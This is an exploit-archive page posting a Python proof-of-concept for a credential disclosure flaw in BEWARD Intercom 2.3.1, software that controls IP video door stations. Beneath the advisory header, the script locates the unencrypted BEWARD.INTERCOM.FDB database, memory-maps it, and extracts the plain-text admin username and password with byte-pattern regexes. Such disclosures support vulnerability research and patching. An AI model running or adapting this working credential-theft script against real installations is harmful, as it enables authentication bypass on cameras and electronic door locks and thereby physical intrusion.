exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BEWARD Intercom 2.3.1 Credential Disclosure

BEWARD Intercom 2.3.1 Credential Disclosure
Posted Jan 28, 2019
Authored by LiquidWorm | Site zeroscience.mk

BEWARD Intercom version 2.3.1 suffers from a credential disclosure vulnerability.

tags | exploit
SHA-256 | 5f2665b922faea0043fc055d851add24a74572513f8e7d7c229b7bcbdf204c70

BEWARD Intercom 2.3.1 Credential Disclosure

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# BEWARD Intercom 2.3.1 Credentials Disclosure
#
#
# Vendor: Beward R&D Co., Ltd
# Product web page: https://www.beward.net
# Affected version: 2.3.1.34471
# 2.3.0
# 2.2.11
# 2.2.10.5
# 2.2.9
# 2.2.8.9
# 2.2.7.4
#
# Note: For versions above 2.2.11: The application data directory, which
# stores logs, settings and the call records archive, was moved to ProgramData\BEWARD.
#
# New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
# Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
#
# Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time
# Video, Two-Way Audio. The software is used for BEWARD IP video door stations
# control.
#
# Desc: The application stores logs and sensitive information in an unencrypted
# binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to
# the current user session can successfully disclose plain-text credentials that
# can be used to bypass authentication to the affected IP camera and door station
# and bypass access control in place.
#
# Tested on: Microsoft Windows 10 Home (EN)
# Microsoft Windows 7 SP1 (EN)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5505
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php
#
#
#
#######################################################################
# Output:
# --------
# C:\> python beward_creds.py
# Username: admin
# Password: S3cr3tP4$$w0rd
# C:\>
#
#######################################################################
#
# 28.11.2018
#

import subprocess
import mmap######
import re########
import os########

#
# For versions bellow 2.2.11:
#
# cuser = subprocess.check_output("echo %username%", shell=True)
# dbfile = ('C:\Users\\' + cuser.rstrip() + '\Ap'
# 'pData\Local\Beward R&D Co., Ltd\BEW'
# 'ARD Intercom\DB\BEWARD.INTERCOM.FDB'
# )
#

#
# For versions 2.2.11 and above:
#

dbfile = 'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB'

def mapfile(filename):
file = open(filename, "r+")
size = os.path.getsize(filename)
return mmap.mmap(file.fileno(), size)

data = mapfile(dbfile)
m = re.search(r"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data)
print "Username: " + m.group(1)
m = re.search(r"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data)
print "Password: " + m.group(1)
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close